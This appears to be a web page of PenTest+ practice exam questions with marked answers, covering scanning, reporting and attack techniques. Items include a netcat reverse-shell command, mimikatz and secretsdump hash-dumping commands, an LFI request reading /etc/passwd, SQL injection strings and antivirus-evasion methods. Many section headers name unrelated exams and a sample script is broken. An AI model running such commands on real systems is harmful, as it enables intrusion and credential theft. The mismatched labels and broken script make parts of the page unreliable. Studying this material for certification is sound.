Ethical Hacking and CompTIA PenTest+ with 2 Practice Tests Set 1

Which command can be used to help analyze the contents of a binary file? (Selecttwo all that apply.)


Options are :

  • `echo`
  • `strings` (Correct)
  • `cat`
  • `binwalk` (Correct)

Answer :`strings` `binwalk`

CompTIA Network+ (N10-007) : 6 Practice Exams - 2019 Set 1

The HTTPOnly attribute that can accompany a Set-Cookie response header is responsible for which of the following?


Options are :

  • Defining the URL where the cookie is valid
  • Setting the Secure flag to only allow for SSL connectors
  • Preventing the cookie from being accessed via JavaScript (Correct)
  • Defining the domain where the cookie is valid

Answer :Preventing the cookie from being accessed via JavaScript

Which of the following TCP ports host applications that naturally support file transfer capabilities? (Choose three.)


Options are :

  • 53
  • 21 (Correct)
  • 902
  • 22 (Correct)
  • 80 (Correct)

Answer :21 22 80

What does the following script do?

#!/bin/bash

today=$(date +%Y=%m-%d)

log_dir="/var/www/logs"

dst+dir="/tmp/logs"


count=$(ls $log_dir | wc -l)


if [ $count -gt 0 ] then

echo "Moving $count logs on $today" >>/var/www/moveLog.txt

mv $log_dir/* $dst_dir

for i in 'ls $dst_dir'; do

scp -i key $dst_dir/$i [email protected]:/logs/websrv1/www

echo $dst_dir/$i

rm -rf $dst_dir/$i

done

else

echo "No files to move $today" >>/var/www/moveLog.txt

fi


Options are :

  • Secure copies the files and then removes the files from the remote host
  • Copies log files to another directory and then removes all the logs
  • Moves log files to another directory and then secure copies the files to another host using a password
  • Moves log files to another directory, then secure copies the files to another host using `scp`, and then removes the files that were secure copied (Correct)

Answer :Moves log files to another directory, then secure copies the files to another host using `scp`, and then removes the files that were secure copied

JK0-019 CompTIA E2C Network + Certification Exam Set 2

When executing a UDP port scan against a customer network, you want to start out by scanning only those ports that are known to have UDP services present. Which of the following options can you use to scan for SNMP, NTP, NetBIOS, and DNS?


Options are :

  • `nmap -vv -sUV -p 53-123,137,139,161 192.168.1.0/24 -oA udpscan`
  • `nmap -vv -sUV -p 53, 123, 137-139, 161, 123 192.168.1.0/24 -oA udpscan`
  • `nmap -vv -sUV -p 53-161 192.168.1.0/24 -oA udpscan`
  • `nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan` (Correct)

Answer :`nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan`

Which contractual document is signed by two consenting parties to protect each other's competitive advantages?


Options are :

  • SOW
  • RoE
  • NDA (Correct)
  • MSA

Answer :NDA

Which of the following options provides guidance for planning and conducting technical information security tests?


Options are :

  • NIST SP 800-37
  • FIPS 199
  • NIST SP 800-115 (Correct)
  • DoD 8570

Answer :NIST SP 800-115

N10-006 CompTIA Network+ Certification Practice Test Set 1

Which of the following commands can help recover the list of local hashes from the SAM database? (Choose three.)


Options are :

  • `mimikatz_command -f samdump::hashes` (Correct)
  • `mimikatz_command -f samdump::`
  • `impacket-secretsdump [user]:[pass]@[ipaddress]` (Correct)
  • The Windows `reg` command (Correct)

Answer :`mimikatz_command -f samdump::hashes` `impacket-secretsdump [user]:[pass]@[ipaddress]` The Windows `reg` command

Which service is the following nmap command syntax going to scan?```nmap -n -Pn -sUV -p 53 192.168.1.50```


Options are :

  • FTP
  • DNS (Correct)
  • NTP
  • SNMP

Answer :DNS

Which of the following can be used as a defense-evasion technique? (Choose three.)


Options are :

  • Changing and modifying code from the `Invoke-Mimikatz.ps1` script from PowerSploit to evade antivirus signature detection (Correct)
  • Using MD5 to encode a password that can be used in Mimikatz with PtH on a Windows network
  • Base64-encoding a PowerShell command to execute against a remote host on the network (Correct)
  • Encoding an x86 Windows payload with shikata_ga_nai (Correct)

Answer :Changing and modifying code from the `Invoke-Mimikatz.ps1` script from PowerSploit to evade antivirus signature detection Base64-encoding a PowerShell command to execute against a remote host on the network Encoding an x86 Windows payload with shikata_ga_nai

Comptia A+ (220-801) Certification Exam Practice Test Set 1

Which of the following can be used to automatically set the RHOSTS field for the Metasploit module using the results of a search? (Select all that apply.)


Options are :

  • All of the answer choices are correct (Correct)
  • `notes -S "http" -R`
  • `hosts -R`
  • `services -p 445 -R`
  • `vulns -p 22 --rhosts`

Answer :All of the answer choices are correct

The schedule is an important element to include in the report, as it helps put findings into perspective, such as how long it took to find a particular vulnerability and the time it took to exploit it. This section in the report can be referred to as what?


Options are :

  • Timeline (Correct)
  • Methodology
  • Observations
  • Issues

Answer :Timeline

What is this command doing?```nc 192.168.1.50 4444 -e cmd.exe```


Options are :

  • Forward a command shell from the local Windows host to a remote host over the network (Correct)
  • Forward a command shell from the local Linux host to a remote host over the network
  • Forward a command shell from the remote host to the local Windows host over the network
  • Forward a command shell from the remote host to the local Linux host over the network

Answer :Forward a command shell from the local Windows host to a remote host over the network

JK0-017 CompTIA E2C Project+ Certification Practice Exam Set 10

The customer uses unattended installation files to automate configuration of both physical and virtual hosts on the network. The remote file share that contains the unattended installation files is writable by everyone on the network. What mitigation would you recommend to the customer to help secure their network? (Choose three.)


Options are :

  • Restrict access based on IP address (Correct)
  • Lock access to share down based on domain access (Correct)
  • Discontinue using unattended installation
  • Restrict write access to only trusted hosts (Correct)

Answer :Restrict access based on IP address Lock access to share down based on domain access Restrict write access to only trusted hosts

What is the methodology or process of enumerating useful information from a target over the network?


Options are :

  • Network information gathering (Correct)
  • Scanning
  • Vulnerability identification
  • Fingerprinting

Answer :Network information gathering

Which network share is available to any member of an organization's Windows Active Directory domain and holds Group Policy Preferences (GPP) to help automate tedious administrative tasks?


Options are :

  • IPC$
  • C$
  • SYSVOL (Correct)
  • ADMIN$

Answer :SYSVOL

HT0-201 CEA- CompTIA DHTI+ Certification Practice Exam Set 2

Which of the following stakeholders from an organization might be interested in the findings and success of a penetration test?


Options are :

  • All of the answer choices are correct (Correct)
  • Executive management
  • IT department
  • The pentest team
  • Contracting or legal department

Answer :All of the answer choices are correct

Which of the following is a valid reason for executing an authenticated vulnerability scan against a target?


Options are :

  • The scan will help exploit target weaknesses and carry out post-exploitation activities.
  • It produces more findings.
  • It helps to reduce false positives. (Correct)
  • You will be able to show more impact in your test results.

Answer :It helps to reduce false positives.

Which of the following algorithms can be used to generate a cryptographic hash value for a password?


Options are :

  • AES
  • MD5 (Correct)
  • RSA
  • Base64

Answer :MD5

CompTIA N10-004 Network+ Certification Practice Test Set 9

Which of the following are common methods used to accomplish VLAN hopping on switched networks? (Choose two.)


Options are :

  • NAC
  • Double tagging (Correct)
  • DNS spoofing
  • Switch spoofing (Correct)

Answer :Double tagging Switch spoofing

Which of the following services can aide a pentester with lateral movement? (Choose all that apply.)


Options are :

  • RSH
  • All of the answer choices are correct (Correct)
  • REXEC
  • DCOM
  • Telnet

Answer :All of the answer choices are correct

What is the purpose of a table of contents in the pentest report?


Options are :

  • To provide page numbers
  • All of the answer choices are correct (Correct)
  • To organize the report
  • To list headings and subheadings

Answer :All of the answer choices are correct

JK0-802 CompTIA A+ Certification Exam Set 6

Which type of confidential document covers items such as social responsibility, business ethics, network and facility access, and so forth?


Options are :

  • NDA
  • SOW
  • RoE
  • MSA (Correct)

Answer :MSA

Which type of testing forces the pentester to gather information using creative methods and sources and typically does not provide any upfront customer knowledge of the environment to be tested?


Options are :

  • White box
  • Black box (Correct)
  • Gray box
  • Goals-based

Answer :Black box

Which of the following commands can you use to query information from an organizations OpenLDAPserver?


Options are :

  • `accesschk.exe`
  • `net group`
  • `searchsploit`
  • `ldapsearch` (Correct)

Answer :`ldapsearch`

JK0-015 CompTIA E2C Security+ 2008 Edition Practice Exam Set 12

The customer has requested the pentest report be encrypted and e-mailed to the project manager identified in the RoE. From the following choices, which option reduces the risk of unauthorized disclosure?


Options are :

  • Encrypt the e-mail and report then send the decryption password for the report via text message. (Correct)
  • Encrypt the report and then send the decryption password and the report in the same e-mail.
  • Encrypt the e-mail and report and send them to the project manager.
  • Encrypt the e-mail and report then send the decryption password for the report via another e-mail.

Answer :Encrypt the e-mail and report then send the decryption password for the report via text message.

The unquoted service path vulnerability can be used to escalate privileges on a Windows target and exploits what function of the operating system?


Options are :

  • Windows registry
  • CreateProcess (Correct)
  • Task Scheduler
  • Weak access controls

Answer :CreateProcess

Using the following example PHP code, what type of attack could this application be susceptible to?Example HTTP GET request:```http://www.example.com/test.php?img=photo1.png```Example PHP code:```<?php$WebDir = '/var/www/html/';if (!(isset($_GET['img']))) die();$img = $_GET['img'];$path = $WebDir . $img;$handle = fopen($path, 'rb');// ..additional code omitted below...<?```


Options are :

  • SQLi
  • Directory indexing
  • Directory traversal attack (Correct)
  • Clickjacking

Answer :Directory traversal attack

CompTIA Security+ Cert. (SY0-501): Practice Tests 2019 Set 4

Which of the following command-line utilities can be used to interrogate a DNS server?


Options are :

  • `dig` (Correct)
  • `domainname`
  • `whois`
  • `bind`

Answer :`dig`

When should you dispose of the customer's pentest report and sensitive data? (Choose the BEST answer.)


Options are :

  • Never.
  • After the customer debrief.
  • The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE. (Correct)
  • Once the customer confirms receipt of the pentest report.

Answer :The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE.

Which fully executed document provides authorization from an organization to conduct a pentest and will include or elaborate on subjects defined in the SOW?


Options are :

  • RoE (Correct)
  • NDA
  • Contractual agreement
  • MSA

Answer :RoE

SY0-401 CompTIA Security+ Certification Practice Exam Set 2

Which of the following hash types is used in pass the hash (PtH) attacks?


Options are :

  • NTLM (Correct)
  • NTLMv2
  • SHA256
  • MD5

Answer :NTLM

Which type of assessment is required for organizations that accept, process, or store consumer payment card information?


Options are :

  • PCI DSS (Correct)
  • HIPAA
  • Red team
  • FISMA

Answer :PCI DSS

What is senior (executive) management's role in a top-down management approach?


Options are :

  • To dictate goals and objectives (Correct)
  • To carry out the plan of action for the organization
  • To update the organization's policy documentation
  • None of the answer choices are correct

Answer :To dictate goals and objectives

CompTIA JK0-015 E2C Security+ Certification Practice Test Set 13

Which of the following Windows shares are readable on the local area network by default?


Options are :

  • IPC$ (Correct)
  • ADMIN$
  • All of the answer choices are correct
  • C$

Answer :IPC$

The following HTTP POST request is an example of what type of attack?```POST /request.php?id=php://input&amp;cmd=cat%20/etc/passwd HTTP/1.1```


Options are :

  • Local file inclusion (LFI) (Correct)
  • Directory traversal
  • Remote file inclusion (RFI)
  • Cross-site request forgery (CSRF)

Answer :Local file inclusion (LFI)

Which of the following utilities can be used to enumerate NFS share information from a file server over the network? (Choose two.)


Options are :

  • All of the answer choices are correct
  • `rpcinfo`
  • `nfs-showmount.nse` (Correct)
  • `showmount` (Correct)

Answer :`nfs-showmount.nse` `showmount`

CV0-001 CompTIA Cloud+ Certification Practice Exam Set 5

When using the airodump-ng tool to collect wireless network packets, why would you want to define the channel to listen on?


Options are :

  • When attempting to crack the wireless encryption key or four-way handshake, it's best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks. (Correct)
  • Using the same channel as your target wireless device will help speed up the time necessary to crack the PSK offline.
  • You should always specify the channel your target is listening on when conducting wireless surveys and exploitation activities.
  • Channel hopping is a technique used by airodump-ng to determine the channel a target host is listening on.

Answer :When attempting to crack the wireless encryption key or four-way handshake, it's best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks.

Which of the following options can be used to conduct vulnerability research?


Options are :

  • CAPEC
  • CWE
  • CVE
  • All of the answer choices are correct (Correct)

Answer :All of the answer choices are correct

When conducting network and enumeration scanning on the customer's network, your team requests operating system information to help with the vulnerability mapping process. Given the following nmap syntax, which of the following options can help provide OS fingerprinting?```nmap -vv -n -Pn -sSVC -O -T4 -p- 10.1.10.0/24 -oA 10.1.10.0.syn```


Options are :

  • `-n`
  • `-Pn`
  • `-O` (Correct)
  • `-sSV`

Answer :`-O`

JK0-015 CompTIA E2C Security+ 2008 Edition Practice Exam Set 10

Which of the following options is an example of Boolean-based SQL injection? (Choose two.)


Options are :

  • www.example.com/info.php?id=2;2--
  • www.example.com/info.php?id=2 AND 3=4 (Correct)
  • www.example.com/info.php?id=1 AND 1=1 (Correct)
  • www.example.com/info.php?id=1;UNION SELECT * from mysql.users;--

Answer :www.example.com/info.php?id=2 AND 3=4 www.example.com/info.php?id=1 AND 1=1

The customer is using SSH for remote logins and transferring files to hosts on the local area network. However, you also found FTP and Telnet open on most of the Unix servers in the customer environment. The system administrator says they don't use those legacy programs any longer. How would you document this in a pentest report, even though you did not exploit these services?


Options are :

  • Ask for additional time to test the services.
  • Include as an "unnecessary open services" observation in the executive summary. (Correct)
  • Record this as a critical finding.
  • Do not address this in the report, since the services are on the LAN and are not exposed to external attacks.

Answer :Include as an "unnecessary open services" observation in the executive summary.

Which of the following can assist you with brute-forcing a web application login page? (Choose three.)


Options are :

  • CeWL (Correct)
  • Hydra (Correct)
  • XSS
  • Wordlist (Correct)
  • CSRF

Answer :CeWL Hydra Wordlist

JK0-015 CompTIA E2C Security+ 2008 Edition Practice Exam Set 8

Which of the following compliance standards require(s) organizations to maintain a secure environment? (Choose three.)


Options are :

  • FISMA (Correct)
  • NIST
  • HIPAA (Correct)
  • PCI DSS (Correct)
  • CIS

Answer :FISMA HIPAA PCI DSS

The username and password of admin/admin could be considered which of the following?


Options are :

  • Weak credential
  • Susceptible to brute-force or password guessing attacks
  • Default credential
  • All of the answer choices are correct (Correct)

Answer :All of the answer choices are correct

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions